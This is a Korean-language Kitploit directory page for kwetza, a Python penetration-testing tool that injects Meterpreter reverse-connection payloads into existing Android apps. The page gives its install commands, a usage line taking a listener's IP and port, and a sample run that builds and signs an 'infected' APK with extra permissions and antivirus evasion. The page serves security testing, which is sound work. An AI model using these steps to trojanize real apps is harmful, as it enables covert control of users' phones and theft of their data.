Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
kwetza — Python 스크립트로, 기존 Android 애플리케이션에 Meterpreter 페이로드를 주입합니다. | Kitploit
도구/GitHubGitHub/sensepost/kwetza
Android SecurityPayload GenerationExploitationMobile App PentestingPenetration TestingPayload Development
GitHubsensepost/kwetza

kwetza

Python 스크립트로, 기존 Android 애플리케이션에 Meterpreter 페이로드를 주입합니다.

저장소 보기
6442398년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

소개

Arsenal

크리스 르 로이(@brompwnie) [email protected] 작성

Kwetza는 기존 안드로이드 애플리케이션에 Meterpreter 페이로드를 감염시킬 수 있는 도구입니다.

무엇을 하나요?

Kwetza는 기존 안드로이드 애플리케이션에 사용자 정의 또는 기본 페이로드 템플릿을 주입하여 안티바이러스 탐지를 회피합니다. Kwetza는 대상 애플리케이션의 기본 권한을 사용하거나 추가 권한을 주입하여 추가 기능을 얻을 수 있도록 합니다.

블로그 포스트는 어디에서 볼 수 있나요?

Kwetza가 자동화한 수동 단계는 여기에서 확인할 수 있습니다: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

코드 가져오기

먼저 코드를 가져옵니다:

root@kitploit:~
git clone https://github.com/sensepost/kwetza.git

Kwetza는 Python으로 작성되었으며 Pip을 사용하여 설치할 수 있는 BeautifulSoup가 필요합니다:

root@kitploit:~
pip install beautifulsoup4

Kwetza는 Apktool이 설치되어 PATH를 통해 접근 가능해야 합니다. 이는 다음 설치 지침을 사용하여 설정할 수 있습니다: https://ibotpeaches.github.io/Apktool/install

사용법

python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass

  • nameOfTheApkToInfect.apk = 감염시키려는 APK의 이름.
  • https/tcp = HTTPS 또는 TCP 연결 선택.
  • LHOST = 리스너의 IP.
  • LPORT = 리스너의 포트.
  • yes = 애플리케이션에 추가 악성 권한을 주입하려면 "yes", 애플리케이션의 기본 권한을 사용하려면 "no".
  • customClass = Kwetza가 이 액티비티에 주입하도록 하려면 여기에 사용자 정의 액티비티를 지정.
root@kitploit:~
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

정보

Kwetza는 Python 2에서 작동하도록 개발되었습니다.

Kwetza는 기본적으로 "payload" 폴더에 있는 템플릿과 키스토어를 사용하여 감염된 APK를 주입하고 서명합니다.

감염된 애플리케이션을 자신의 인증서로 서명하려면 새 키스토어를 생성하여 "payload" 폴더에 넣고 기존 키스토어의 이름을 바꾸거나 kwetza.py의 참조를 변경하십시오.

페이로드 템플릿에 대해서도 동일하게 수행할 수 있습니다.

기본 키스토어의 비밀번호는 'password'입니다.

라이선스

Kwetza는 크리에이티브 커먼즈 저작자표시-비영리-동일조건변경허락 4.0 국제 라이선스(http://creativecommons.org/licenses/by-nc-sa/4.0)에 따라 사용이 허가됩니다.

이 라이선스 범위를 초과하는 권한은 http://sensepost.com/contact에서 확인할 수 있습니다.

도구 다운로드